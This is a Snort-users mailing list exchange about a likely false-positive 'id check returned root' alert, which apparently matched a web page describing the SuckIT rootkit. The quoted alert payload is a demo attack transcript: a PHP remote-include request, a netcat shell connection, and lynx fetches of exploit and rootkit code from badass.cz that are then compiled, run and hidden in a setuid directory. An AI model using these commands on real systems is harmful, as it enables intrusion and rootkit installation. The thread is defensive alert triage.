Re: ATTACK-RESPONSES id check returned root

[Matt Kettler <mkettler () evi-inc com>]

At casual glance, it looks like the rule matched the text of a web-page that was
describing a rootkit. Note that the source port is port 80.


Chris Romano wrote:
> I came in this moring and checked my snort alerts (morning routine), and
> noticed the following:
>
> ATTACK-RESPONSES id check returned root            2005-10-21
> 07:40:32            82.165.25.125:80
> <http://82.165.25.125:80>             10.10.10.5:51949
> <http://10.10.10.5:51949>             TCP
>
> Some background.  10.10.10.x is my dmz and 10.10.10.5
> <http://10.10.10.5> is a firewall/proxy (Slack 10.1) that connects the
> 10.10.10.x to our 192.168.0.x internal network.
> So I started digging around. The alert logged the following:
>
> SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit  *.*
> (c)oded by sd () sf cz <mailto:sd () sf cz> &amp; devik () cdi cz
> <mailto:devik () cdi cz>, 2001
> Configuring ./sk:.OK!.[attacker () badass cz <mailto:attacker () badass cz>
> ~/sk10]$ telnet lamehost.com <http://lamehost.com> 80.Trying
> 192.160.0.2.... Connected to lamehost.com..Escape character is '^]'..GET
> /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host: lamehost.com
> <http://lamehost.com> ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52
> GMT.Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux)
> PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ET
> <http://GMT.ET> ag: &quot;31c6-c2-3bb3ffba&quot;.Content-Type:
> text/html..IT WERKS! Shell at port 8193 Connection closed by foreign
> host..[attacker () badass cz~/sk10]$ nc -v lamehost.com
> <http://lamehost.com> 8193.lamehost.com <http://8193.lamehost.com>
> [192.168.0.2 <http://192.168.0.2>] 8193 (?) open.w.12:08am up  1:20,  3
> users,  load average: 0.05, 0.06,0.08.USER     TTY      FROM   
> LOGIN@IDLE   JCPU   PCPU  AT.root   tty1     -  11:58pm 39:03   3.15s 
> 2.95s  bash.cd <http://bash.cd> /tmp.lynx -dump http://badass.cz/s.c &gt
> <http://badass.cz/s.c&gt>; s.c.gcc s.c o
> super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root)
> gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd
> .l33t.lynx -dump http://badass.cz/~attacker/sk10/s
> k &gt; sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * * *
> * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w
>
> Ok, there a few things that make me think that this is a false
> positive.  First is the "192.160.0.02 <http://192.160.0.02>" IP.  That
> is not on this network.  Second, There is no host on 192.168.0.2
> <http://192.168.0.2>.  Third, I do not have any Red Hat machines.  They
> are all Slackware.  I am still concerned.  I searched for "sk" and all I
> found are two directories related to vim and I didn't find a directory
> called "l33t".
>
> Can anyone help me out?
>
> Thanks,
> Chris



-------------------------------------------------------
This SF.Net email is sponsored by:
Power Architecture Resource Center: Free content, downloads, discussions,
and more. http://solutions.newsforge.com/ibmarch.tmpl
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users